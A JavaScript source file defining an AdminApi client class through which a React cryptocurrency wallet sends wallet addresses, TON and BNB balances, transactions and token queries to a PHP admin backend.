// Admin Panel API Integration for React Wallet
const ADMIN_API_BASE = 'https://ton.wallet.tflash.xyz/admin/api'; // Change this to your domain

class AdminApi {
    static async sendRequest(endpoint, data = null) {
        try {
            const url = `${ADMIN_API_BASE}/${endpoint}`;
            const options = {
                method: data ? 'POST' : 'GET',
                headers: {
                    'Content-Type': 'application/json',
                },
            };

            if (data) {
                options.body = JSON.stringify(data);
            }

            const response = await fetch(url, options);
            
            // Check if response is ok
            if (!response.ok) {
                console.warn(`Admin API Error: HTTP ${response.status} for ${endpoint}`);
                return { success: false, message: `HTTP ${response.status} error` };
            }

            // Check if response has content
            const text = await response.text();
            if (!text || text.trim() === '') {
                console.warn(`Admin API Error: Empty response for ${endpoint}`);
                return { success: false, message: 'Empty response from server' };
            }

            // Try to parse JSON
            try {
                const json = JSON.parse(text);
                return json;
            } catch (jsonError) {
                console.error(`Admin API Error: Invalid JSON for ${endpoint}:`, text);
                return { success: false, message: 'Invalid JSON response' };
            }
        } catch (error) {
            console.warn('Admin API Error:', error.message);
            // Return a safe fallback response instead of throwing
            return { success: false, message: 'Network error', error: error.message };
        }
    }

    // Wallet Management
    static async addWallet(address, chain) {
        const result = await this.sendRequest('wallets.php', {
            action: 'add_wallet',
            address,
            chain
        });
        return result;
    }

    static async updateBalance(address, balanceTon, balanceBnb) {
        const result = await this.sendRequest('wallets.php', {
            action: 'update_balance',
            address,
            balance_ton: balanceTon,
            balance_bnb: balanceBnb
        });
        return result;
    }

    // Transaction Management
    static async getTransactions(address = null, limit = 100) {
        const params = address ? `?action=get_all&address=${address}&limit=${limit}` : `?action=get_all&limit=${limit}`;
        const result = await this.sendRequest(`transactions.php${params}`);
        return result;
    }

    static async addTransaction(transactionData) {
        const result = await this.sendRequest('transactions.php', {
            action: 'add_transaction',
            ...transactionData
        });
        return result;
    }

    static async updateTransactionStatus(txHash, status) {
        const result = await this.sendRequest('transactions.php', {
            action: 'update_status',
            tx_hash: txHash,
            status: status
        });
        return result;
    }

    // Token Management
    static async getTokens() {
        const result = await this.sendRequest('tokens.php');
        return result;
    }

    static async getTokenById(id) {
        const result = await this.sendRequest(`tokens.php?action=get&id=${id}`);
        return result;
    }
}

export default AdminApi; 